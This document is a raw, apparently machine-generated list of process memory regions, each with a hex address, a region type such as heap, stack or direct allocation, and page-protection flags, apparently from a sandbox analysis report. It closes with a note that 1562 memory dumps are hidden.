15D1B486000
heap
page read and write
46FE000
stack
page read and write
10CB000
unkown
page execute and read and write
7FFD99CD0000
trusted library allocation
page execute and read and write
3DFF000
stack
page read and write
19E9000
heap
page read and write
19FB000
heap
page read and write
7610000
trusted library allocation
page read and write
5670000
direct allocation
page read and write
2620000
direct allocation
page read and write
5800000
direct allocation
page execute and read and write
547C07E000
stack
page read and write
51D0000
direct allocation
page read and write
D65000
heap
page read and write
48CE000
stack
page read and write
408E000
stack
page read and write
4B21000
heap
page read and write
54F3000
trusted library allocation
page read and write
6EAE000
stack
page read and write
162101B9000
heap
page read and write
5800000
direct allocation
page execute and read and write
51E1000
heap
page read and write
CC0000
heap
page read and write
F3B000
unkown
page execute and read and write
5D4000
unkown
page readonly
393F000
stack
page read and write
15D1B48B000
heap
page read and write
1102000
heap
page read and write
15A0F869000
heap
page read and write
1394000
unkown
page execute and read and write
2620000
direct allocation
page read and write
15A0DF53000
heap
page read and write
15A0DF38000
heap
page read and write
11D8000
heap
page read and write
5250000
direct allocation
page execute and read and write
3836000
heap
page read and write
15D011F5000
heap
page read and write
1976000
heap
page read and write
41BF000
stack
page read and write
3E9F000
stack
page read and write
766E000
stack
page read and write
51E1000
heap
page read and write
5620000
trusted library allocation
page read and write
7458000
heap
page read and write
3ECE000
stack
page read and write
72DE000
stack
page read and write
547BB8E000
stack
page read and write
DB9000
heap
page read and write
7FFD99C6C000
trusted library allocation
page execute and read and write
56FE000
stack
page read and write
3B1E000
stack
page read and write
3FBE000
stack
page read and write
5860000
direct allocation
page execute and read and write
51E1000
heap
page read and write
384F000
stack
page read and write
324E000
stack
page read and write
50CE000
stack
page read and write
15D1B200000
heap
page read and write
36AD000
heap
page read and write
508F000
stack
page read and write
DF5000
heap
page read and write
51E1000
heap
page read and write
10FD000
stack
page read and write
5140000
direct allocation
page execute and read and write
10D2000
heap
page read and write
11AE000
unkown
page execute and read and write
4A1E000
stack
page read and write
51E1000
heap
page read and write
447E000
stack
page read and write
1730000
heap
page read and write
1158000
heap
page read and write
19AC000
heap
page read and write
259E000
stack
page read and write
51E1000
heap
page read and write
1081000
heap
page read and write
11EA000
heap
page read and write
547CF4E000
stack
page read and write
51E1000
heap
page read and write
47CF000
stack
page read and write
15A0DECC000
heap
page read and write
3F4E000
stack
page read and write
702E000
stack
page read and write
F39000
unkown
page write copy
4AB0000
direct allocation
page execute and read and write
1540000
direct allocation
page read and write
547C3FE000
stack
page read and write
51CF000
stack
page read and write
15A0DF40000
heap
page read and write
7830000
heap
page read and write
4F43000
trusted library allocation
page read and write
7FFD99E70000
trusted library allocation
page read and write
51E1000
heap
page read and write
51E1000
heap
page read and write
3ADF000
stack
page read and write
37F0000
heap
page read and write
4B21000
heap
page read and write
15A0DF26000
heap
page read and write
4D0E000
stack
page read and write
188E000
stack
page read and write
68EF000
heap
page read and write
15D01210000
heap
page read and write
4AE33FC000
stack
page read and write
3678000
heap
page read and write
36E8000
heap
page read and write
15A0DF3C000
heap
page read and write
51E1000
heap
page read and write
DF0000
heap
page read and write
69EC000
trusted library allocation
page read and write
15D010B0000
heap
page read and write
162101B9000
heap
page read and write
15D1B243000
heap
page read and write
15D1B156000
heap
page read and write
4B21000
heap
page read and write
57F0000
direct allocation
page execute and read and write
1540000
direct allocation
page read and write
7010000
heap
page read and write
ED1000
unkown
page execute and write copy
1A18000
heap
page read and write
7B0000
unkown
page readonly
25DE000
stack
page read and write
2620000
direct allocation
page read and write
2620000
direct allocation
page read and write
5670000
heap
page read and write
DED000
stack
page read and write
68F0000
heap
page read and write
71ED000
stack
page read and write
15D1B3ED000
heap
page read and write
DFE000
stack
page read and write
5210000
direct allocation
page execute and read and write
320F000
stack
page read and write
410F000
stack
page read and write
CC6000
heap
page read and write
6BE5000
heap
page read and write
51E1000
heap
page read and write
2770000
direct allocation
page read and write
69E5000
trusted library allocation
page read and write
2E10000
heap
page read and write
4B21000
heap
page read and write
4481000
heap
page read and write
1133000
heap
page read and write
1182000
heap
page read and write
547BB03000
stack
page read and write
51E1000
heap
page read and write
2FB0000
heap
page read and write
4B21000
heap
page read and write
2770000
direct allocation
page read and write
51E1000
heap
page read and write
AC1000
unkown
page execute and read and write
5D5D000
stack
page read and write
1540000
direct allocation
page read and write
83CF000
stack
page read and write
3470000
heap
page read and write
51E1000
heap
page read and write
AD1000
unkown
page execute and write copy
4920000
direct allocation
page read and write
88C5000
trusted library allocation
page read and write
CFD000
stack
page read and write
425F000
stack
page read and write
51D0000
direct allocation
page read and write
5297000
trusted library allocation
page read and write
51E1000
heap
page read and write
4ED0000
heap
page execute and read and write
109E000
heap
page read and write
547BF7C000
stack
page read and write
1394000
unkown
page execute and read and write
10FB000
heap
page read and write
7010000
heap
page read and write
3030000
heap
page read and write
418F000
stack
page read and write
475F000
stack
page read and write
145E000
stack
page read and write
37FE000
stack
page read and write
15D02AE0000
trusted library allocation
page read and write
51E1000
heap
page read and write
4AF0000
direct allocation
page execute and read and write
15D13050000
trusted library allocation
page read and write
838D000
stack
page read and write
162101A1000
heap
page read and write
51E1000
heap
page read and write
4B21000
heap
page read and write
1540000
direct allocation
page read and write
51E1000
heap
page read and write
5210000
direct allocation
page execute and read and write
8B1C000
stack
page read and write
162101B9000
heap
page read and write
19B3000
heap
page read and write
51E1000
heap
page read and write
819000
unkown
page write copy
51E1000
heap
page read and write
2620000
direct allocation
page read and write
162102B5000
trusted library allocation
page read and write
1147000
heap
page read and write
7497000
heap
page read and write
3B4F000
stack
page read and write
7FFD99F80000
trusted library allocation
page read and write
109E000
heap
page read and write
111B000
heap
page read and write
4B30000
heap
page read and write
F20000
heap
page read and write
3E3F000
stack
page read and write
83E0000
heap
page read and write
3C4E000
stack
page read and write
5CC000
unkown
page write copy
490F000
stack
page read and write
15A0DF1A000
heap
page read and write
7AE000
stack
page read and write
3D8E000
stack
page read and write
69F7000
trusted library allocation
page read and write
51D0000
direct allocation
page execute and read and write
1C4E000
stack
page read and write
490F000
stack
page read and write
4B21000
heap
page read and write
4920000
direct allocation
page read and write
51D0000
direct allocation
page read and write
5270000
direct allocation
page execute and read and write
4481000
heap
page read and write
2E17000
heap
page read and write
3F7E000
stack
page read and write
7606000
trusted library allocation
page read and write
E22000
heap
page read and write
4B21000
heap
page read and write
15A0DE8E000
heap
page read and write
4DCE000
stack
page read and write
1164000
heap
page read and write
812000
unkown
page execute and read and write
52A0000
direct allocation
page execute and read and write
9F0000
heap
page read and write
7FFD99CF6000
trusted library allocation
page execute and read and write
2F6E000
stack
page read and write
51E0000
heap
page read and write
36E8000
heap
page read and write
600000
heap
page read and write
4FB0000
direct allocation
page read and write
7FFD99C1D000
trusted library allocation
page execute and read and write
1A1B000
heap
page read and write
57A000
heap
page read and write
C76000
unkown
page execute and write copy
37F3000
heap
page read and write
4BCE000
stack
page read and write
8310000
trusted library allocation
page read and write
19D1000
heap
page read and write
1072000
heap
page read and write
10EC000
heap
page read and write
7FFD99ED0000
trusted library allocation
page read and write
4B21000
heap
page read and write
44F1000
heap
page read and write
110B000
heap
page read and write
4E0F000
stack
page read and write
31FE000
stack
page read and write
7780000
trusted library allocation
page read and write
2DFF000
stack
page read and write
51D0000
direct allocation
page read and write
1540000
direct allocation
page read and write
51E1000
heap
page read and write
4B21000
heap
page read and write
77E0000
trusted library allocation
page read and write
19E7000
heap
page read and write
1133000
heap
page read and write
51E1000
heap
page read and write
4AB0000
direct allocation
page execute and read and write
DDE000
heap
page read and write
113E000
stack
page read and write
3073000
trusted library allocation
page execute and read and write
DC0000
heap
page read and write
15D01263000
heap
page read and write
118F000
heap
page read and write
36C8000
heap
page read and write
51E1000
heap
page read and write
15A0DF26000
heap
page read and write
819000
unkown
page write copy
15D1332C000
trusted library allocation
page read and write
36FD000
heap
page read and write
4B21000
heap
page read and write
36E5000
heap
page read and write
4B21000
heap
page read and write
36E4000
heap
page read and write
2620000
direct allocation
page read and write
4B21000
heap
page read and write
3F7F000
stack
page read and write
4980000
direct allocation
page read and write
4B21000
heap
page read and write
E3E000
stack
page read and write
11C6000
heap
page read and write
5180000
direct allocation
page execute and read and write
AD1000
unkown
page execute and read and write
4B21000
heap
page read and write
5D0000
unkown
page write copy
3C1F000
stack
page read and write
4B21000
heap
page read and write
5140000
direct allocation
page execute and read and write
19F1000
heap
page read and write
1102000
heap
page read and write
8400000
trusted library allocation
page read and write
40BE000
stack
page read and write
4DF5000
heap
page execute and read and write
AD2000
unkown
page execute and write copy
15D04CE6000
trusted library allocation
page read and write
15A0DF29000
heap
page read and write
11F1000
unkown
page execute and write copy
153E000
stack
page read and write
44CF000
stack
page read and write
1620FEDB000
trusted library allocation
page read and write
4BC0000
heap
page read and write
6A9F000
trusted library allocation
page read and write
37D0000
heap
page read and write
7FFD99EF0000
trusted library allocation
page read and write
4B10000
direct allocation
page execute and read and write
2E00000
direct allocation
page read and write
5230000
direct allocation
page execute and read and write
162101BB000
heap
page read and write
15D131F4000
trusted library allocation
page read and write
4B20000
heap
page read and write
36BE000
stack
page read and write
42FF000
stack
page read and write
1160000
heap
page read and write
1118000
heap
page read and write
D7F000
stack
page read and write
51E1000
heap
page read and write
7FFD99EB0000
trusted library allocation
page read and write
3D5F000
stack
page read and write
11CB000
heap
page read and write
5F49000
trusted library allocation
page read and write
15D012B0000
heap
page read and write
5EE1000
trusted library allocation
page read and write
15A0DE8E000
heap
page read and write
1982000
heap
page read and write
32FF000
stack
page read and write
5A50000
heap
page read and write
15A0DF03000
heap
page read and write
51E1000
heap
page read and write
4B21000
heap
page read and write
3089000
trusted library allocation
page read and write
57BF000
stack
page read and write
1396000
unkown
page execute and write copy
73BE000
stack
page read and write
15A0DF42000
heap
page read and write
76AE000
stack
page read and write
1170000
heap
page read and write
1190000
heap
page read and write
2E4F000
stack
page read and write
8300000
trusted library allocation
page execute and read and write
C76000
unkown
page execute and write copy
76EE000
stack
page read and write
49C0000
heap
page read and write
4AE30FD000
stack
page read and write
15D03030000
heap
page read and write
15D1B21E000
heap
page read and write
547BEFE000
stack
page read and write
10CC000
heap
page read and write
3A4E000
stack
page read and write
2FCE000
stack
page read and write
51E1000
heap
page read and write
10CC000
heap
page read and write
4B21000
heap
page read and write
4910000
trusted library allocation
page read and write
3EDE000
stack
page read and write
4B21000
heap
page read and write
4B21000
heap
page read and write
4DF0000
heap
page execute and read and write
293F000
stack
page read and write
4B21000
heap
page read and write
15A0DF3C000
heap
page read and write
4B21000
heap
page read and write
4481000
heap
page read and write
51E1000
heap
page read and write
11BD000
heap
page read and write
440F000
stack
page read and write
75FD000
stack
page read and write
4B21000
heap
page read and write
11E9000
heap
page read and write
15A0DF3A000
heap
page read and write
4AB0000
direct allocation
page execute and read and write
1A1B000
heap
page read and write
15A0E060000
heap
page read and write
15A0DEDA000
heap
page read and write
118E000
heap
page read and write
7442000
heap
page read and write
38CF000
stack
page read and write
493F000
stack
page read and write
10E0000
heap
page read and write
11C6000
heap
page read and write
C90000
heap
page read and write
113F000
heap
page read and write
4B10000
direct allocation
page execute and read and write
547C0FD000
stack
page read and write
51E1000
heap
page read and write
385E000
stack
page read and write
51E1000
heap
page read and write
2E3E000
stack
page read and write
15A0DEB7000
heap
page read and write
400E000
stack
page read and write
51E1000
heap
page read and write
15A0DF37000
heap
page read and write
1118000
heap
page read and write
4B21000
heap
page read and write
819000
unkown
page read and write
15D030C3000
trusted library allocation
page read and write
3B0D000
stack
page read and write
5140000
direct allocation
page execute and read and write
51E1000
heap
page read and write
51E1000
heap
page read and write
36F7000
heap
page read and write
8F6A000
heap
page read and write
7FFD99E80000
trusted library allocation
page read and write
3790000
heap
page read and write
15D1B47F000
heap
page read and write
30BF000
stack
page read and write
51E1000
heap
page read and write
AD1000
unkown
page execute and write copy
5F09000
trusted library allocation
page read and write
11EE000
heap
page read and write
44F1000
heap
page read and write
162101B9000
heap
page read and write
11E1000
unkown
page execute and read and write
51E1000
heap
page read and write
A8E000
unkown
page execute and read and write
36EF000
heap
page read and write
8430000
heap
page read and write
19F4000
heap
page read and write
570000
heap
page read and write
3670000
heap
page read and write
2770000
direct allocation
page read and write
1217000
heap
page read and write
2770000
direct allocation
page read and write
5760000
heap
page read and write
36E4000
heap
page read and write
4F4F000
stack
page read and write
15A0DE86000
heap
page read and write
5424000
heap
page read and write
193A000
heap
page read and write
51E1000
heap
page read and write
162101BA000
heap
page read and write
AD2000
unkown
page execute and write copy
112A000
heap
page read and write
51E1000
heap
page read and write
343E000
stack
page read and write
547C4FE000
stack
page read and write
2E1D000
heap
page read and write
51E1000
heap
page read and write
51E1000
heap
page read and write
40BF000
stack
page read and write
ED0000
unkown
page readonly
51E1000
heap
page read and write
51E1000
heap
page read and write
11B5000
heap
page read and write
1620FF00000
heap
page read and write
735F000
stack
page read and write
36FD000
heap
page read and write
19E6000
heap
page read and write
2E00000
direct allocation
page read and write
74A4000
heap
page read and write
4AC0000
direct allocation
page execute and read and write
3D9E000
stack
page read and write
970000
heap
page read and write
3259000
stack
page read and write
51E1000
heap
page read and write
5D1F000
stack
page read and write
1133000
heap
page read and write
15D02B75000
heap
page read and write
4B21000
heap
page read and write
4B21000
heap
page read and write
15A0DF37000
heap
page read and write
4B21000
heap
page read and write
15A0DE8E000
heap
page read and write
1A11000
heap
page read and write
255E000
stack
page read and write
4B21000
heap
page read and write
73E4000
heap
page read and write
3487000
heap
page read and write
4B30000
direct allocation
page execute and read and write
5140000
direct allocation
page execute and read and write
49DF000
stack
page read and write
1135000
heap
page read and write
4B21000
heap
page read and write
4B00000
direct allocation
page execute and read and write
192E000
stack
page read and write
114C000
heap
page read and write
77B0000
trusted library allocation
page read and write
7566000
heap
page read and write
8410000
trusted library allocation
page read and write
547C278000
stack
page read and write
15D1B1A3000
heap
page read and write
83F0000
trusted library allocation
page execute and read and write
51E1000
heap
page read and write
51E1000
heap
page read and write
334F000
stack
page read and write
19B8000
heap
page read and write
4B50000
direct allocation
page execute and read and write
AD2000
unkown
page execute and write copy
367F000
stack
page read and write
423E000
stack
page read and write
7FFD99E40000
trusted library allocation
page read and write
7000000
heap
page read and write
7790000
trusted library allocation
page read and write
EEE000
stack
page read and write
7FFD99E00000
trusted library allocation
page execute and read and write
4B10000
direct allocation
page execute and read and write
433F000
stack
page read and write
4B21000
heap
page read and write
1081000
heap
page read and write
15D011F9000
heap
page read and write
980000
heap
page read and write
4F9C000
stack
page read and write
2620000
direct allocation
page read and write
51B0000
direct allocation
page execute and read and write
4B10000
direct allocation
page execute and read and write
51E1000
heap
page read and write
15A0DF19000
heap
page read and write
4481000
heap
page read and write
7FFD99E30000
trusted library allocation
page read and write
510000
heap
page read and write
283F000
stack
page read and write
2D7C000
stack
page read and write
15A0F854000
heap
page read and write
36BF000
stack
page read and write
1A11000
heap
page read and write
57E0000
direct allocation
page execute and read and write
51E0000
direct allocation
page execute and read and write
30C0000
trusted library allocation
page read and write
162102A0000
trusted library allocation
page read and write
AD1000
unkown
page execute and read and write
15A0F86E000
heap
page read and write
15A0DF19000
heap
page read and write
51D0000
direct allocation
page read and write
19D1000
heap
page read and write
2630000
heap
page read and write
19B8000
heap
page read and write
1990000
heap
page read and write
4AD0000
direct allocation
page execute and read and write
5200000
direct allocation
page execute and read and write
15A0F9F4000
heap
page read and write
51D0000
direct allocation
page read and write
353F000
stack
page read and write
2B7F000
stack
page read and write
2A7E000
stack
page read and write
2A3F000
stack
page read and write
15A0F980000
trusted library allocation
page read and write
10E4000
heap
page read and write
EAE000
stack
page read and write
5C2000
unkown
page readonly
4B27000
heap
page read and write
51E1000
heap
page read and write
15D04CE8000
trusted library allocation
page read and write
605000
heap
page read and write
C76000
unkown
page execute and write copy
310E000
stack
page read and write
11DE000
heap
page read and write
4A8E000
stack
page read and write
7FFD99F60000
trusted library allocation
page read and write
5110000
direct allocation
page execute and read and write
DBF000
stack
page read and write
4B21000
heap
page read and write
51E1000
heap
page read and write
1050000
heap
page read and write
51E1000
heap
page read and write
712E000
stack
page read and write
F24000
heap
page read and write
357F000
stack
page read and write
547BFFE000
stack
page read and write
35BE000
stack
page read and write
7FFD99EE0000
trusted library allocation
page read and write
7B1000
unkown
page execute and write copy
2770000
direct allocation
page read and write
496E000
stack
page read and write
6F3B000
stack
page read and write
1102000
heap
page read and write
7FFD99C20000
trusted library allocation
page read and write
501000
unkown
page execute read
547C57B000
stack
page read and write
11BF000
heap
page read and write
3A7E000
stack
page read and write
407F000
stack
page read and write
7730000
trusted library allocation
page read and write
1111000
heap
page read and write
73E8000
heap
page read and write
6FAF000
stack
page read and write
1540000
direct allocation
page read and write
7FFD99DC9000
trusted library allocation
page read and write
51E1000
heap
page read and write
4B70000
direct allocation
page execute and read and write
424F000
stack
page read and write
7740000
trusted library allocation
page execute and read and write
5160000
direct allocation
page execute and read and write
2E00000
direct allocation
page read and write
4B21000
heap
page read and write
4AE2CFE000
stack
page read and write
5764000
heap
page read and write
F32000
unkown
page execute and read and write
4980000
direct allocation
page read and write
1930000
heap
page read and write
8ADC000
stack
page read and write
15A0DEB7000
heap
page read and write
15D02AB0000
heap
page read and write
10DA000
heap
page read and write
4481000
heap
page read and write
4FB0000
direct allocation
page read and write
325E000
stack
page read and write
1082000
heap
page read and write
15D03000000
heap
page execute and read and write
51E1000
heap
page read and write
15D0123A000
heap
page read and write
1182000
heap
page read and write
36D3000
heap
page read and write
489F000
stack
page read and write
3BBF000
stack
page read and write
3D3E000
stack
page read and write
4B21000
heap
page read and write
7B0000
unkown
page read and write
465E000
stack
page read and write
DDA000
heap
page read and write
8320000
trusted library allocation
page read and write
11D2000
heap
page read and write
ED0000
unkown
page readonly
69EA000
trusted library allocation
page read and write
335A000
stack
page read and write
7629000
trusted library allocation
page read and write
451E000
stack
page read and write
4B21000
heap
page read and write
51E1000
heap
page read and write
4B21000
heap
page read and write
51E1000
heap
page read and write
2BCF000
stack
page read and write
51E1000
heap
page read and write
51E1000
heap
page read and write
368E000
heap
page read and write
15D04387000
trusted library allocation
page read and write
5130000
direct allocation
page execute and read and write
1184000
heap
page read and write
2F2E000
stack
page read and write
10E4000
heap
page read and write
7140000
heap
page read and write
15D1B3C0000
heap
page read and write
51D0000
direct allocation
page read and write
812000
unkown
page execute and write copy
7FFD99E10000
trusted library allocation
page read and write
4B21000
heap
page read and write
41CE000
stack
page read and write
56AE000
stack
page read and write
36FD000
heap
page read and write
51D0000
direct allocation
page read and write
43CE000
stack
page read and write
42CF000
stack
page read and write
5E5E000
stack
page read and write
51E1000
heap
page read and write
15D04A0B000
trusted library allocation
page read and write
68F1000
heap
page read and write
51E1000
heap
page read and write
4B00000
direct allocation
page execute and read and write
4FD000
stack
page read and write
51E1000
heap
page read and write
36F0000
heap
page read and write
36B5000
heap
page read and write
15A0DF14000
heap
page read and write
51E1000
heap
page read and write
1558000
heap
page read and write
49AC000
stack
page read and write
44F0000
heap
page read and write
51D0000
direct allocation
page read and write
4A6F000
stack
page read and write
15D01305000
heap
page read and write
3C5E000
stack
page read and write
368E000
heap
page read and write
51E1000
heap
page read and write
35CF000
stack
page read and write
2CBF000
stack
page read and write
4930000
trusted library allocation
page read and write
ABA000
unkown
page execute and read and write
3F3F000
stack
page read and write
4940000
trusted library allocation
page read and write
4AB0000
direct allocation
page execute and read and write
1540000
direct allocation
page read and write
11F2000
unkown
page execute and write copy
51E1000
heap
page read and write
15D1B760000
heap
page read and write
1140000
heap
page read and write
443F000
stack
page read and write
DBE000
stack
page read and write
5F9F000
stack
page read and write
6FAD000
stack
page read and write
15D011D0000
heap
page read and write
2E00000
direct allocation
page read and write
30A2000
trusted library allocation
page read and write
DFC000
heap
page read and write
51E1000
heap
page read and write
51D0000
direct allocation
page read and write
51E1000
heap
page read and write
7483000
heap
page read and write
5220000
direct allocation
page execute and read and write
4B21000
heap
page read and write
706E000
stack
page read and write
11F1000
unkown
page execute and read and write
19D1000
heap
page read and write
7FFD99DC0000
trusted library allocation
page read and write
68E5000
heap
page read and write
AC1000
unkown
page execute and read and write
10DB000
heap
page read and write
1540000
direct allocation
page read and write
1206000
heap
page read and write
5810000
direct allocation
page execute and read and write
5A54000
heap
page read and write
4B21000
heap
page read and write
15D1B04C000
heap
page read and write
15D0123E000
heap
page read and write
7750000
trusted library allocation
page read and write
525000
heap
page read and write
51E1000
heap
page read and write
120F000
heap
page read and write
4B80000
direct allocation
page execute and read and write
1620FEDE000
trusted library allocation
page read and write
71E000
stack
page read and write
344E000
stack
page read and write
10F9000
heap
page read and write
7FFD99E50000
trusted library allocation
page read and write
162101AA000
heap
page read and write
19D1000
heap
page read and write
520000
heap
page read and write
5E9E000
stack
page read and write
4B20000
direct allocation
page execute and read and write
70EA000
stack
page read and write
15D130B2000
trusted library allocation
page read and write
A8E000
unkown
page execute and read and write
729E000
stack
page read and write
33B0000
heap
page read and write
15A0E080000
heap
page read and write
AC1000
unkown
page execute and read and write
51D0000
direct allocation
page read and write
6E6F000
stack
page read and write
4B40000
direct allocation
page execute and read and write
1073000
heap
page read and write
5C1B000
stack
page read and write
584E000
stack
page read and write
4AE0000
direct allocation
page execute and read and write
7B0000
unkown
page readonly
51E1000
heap
page read and write
882E000
stack
page read and write
15A0DF03000
heap
page read and write
69F1000
trusted library allocation
page read and write
393E000
stack
page read and write
15A0DF40000
heap
page read and write
1081000
heap
page read and write
276F000
stack
page read and write
398F000
stack
page read and write
7FFD99C12000
trusted library allocation
page read and write
6A94000
trusted library allocation
page read and write
5190000
direct allocation
page execute and read and write
371F000
stack
page read and write
36F6000
heap
page read and write
415E000
stack
page read and write
7820000
heap
page read and write
7620000
trusted library allocation
page read and write
51E1000
heap
page read and write
347E000
stack
page read and write
11BD000
heap
page read and write
19D1000
heap
page read and write
15A0DE8B000
heap
page read and write
51CF000
stack
page read and write
6FEB000
stack
page read and write
4B21000
heap
page read and write
4B21000
heap
page read and write
36FD000
heap
page read and write
51E1000
heap
page read and write
D7F000
stack
page read and write
68E0000
heap
page read and write
30A5000
trusted library allocation
page execute and read and write
51E1000
heap
page read and write
5880000
direct allocation
page execute and read and write
1178000
heap
page read and write
15A0DF72000
heap
page read and write
5800000
direct allocation
page execute and read and write
510B000
trusted library allocation
page read and write
10CB000
unkown
page execute and read and write
15D02B20000
trusted library allocation
page read and write
33FF000
stack
page read and write
348F000
stack
page read and write
58A0000
direct allocation
page execute and read and write
34DE000
stack
page read and write
51E1000
heap
page read and write
ECF000
stack
page read and write
15D1B44B000
heap
page read and write
15D011B0000
heap
page read and write
15D02B10000
heap
page readonly
10A0000
heap
page read and write
15A0DE60000
heap
page read and write
81B000
unkown
page execute and read and write
59C000
unkown
page readonly
357E000
stack
page read and write
5C2000
unkown
page readonly
51E1000
heap
page read and write
15D011F0000
heap
page read and write
298F000
stack
page read and write
51E1000
heap
page read and write
311F000
stack
page read and write
4B21000
heap
page read and write
69EE000
trusted library allocation
page read and write
51E1000
heap
page read and write
4AF0000
direct allocation
page execute and read and write
120C000
heap
page read and write
411F000
stack
page read and write
15A0DE80000
heap
page read and write
4B21000
heap
page read and write
There are 1562 hidden memdumps, click here to show them.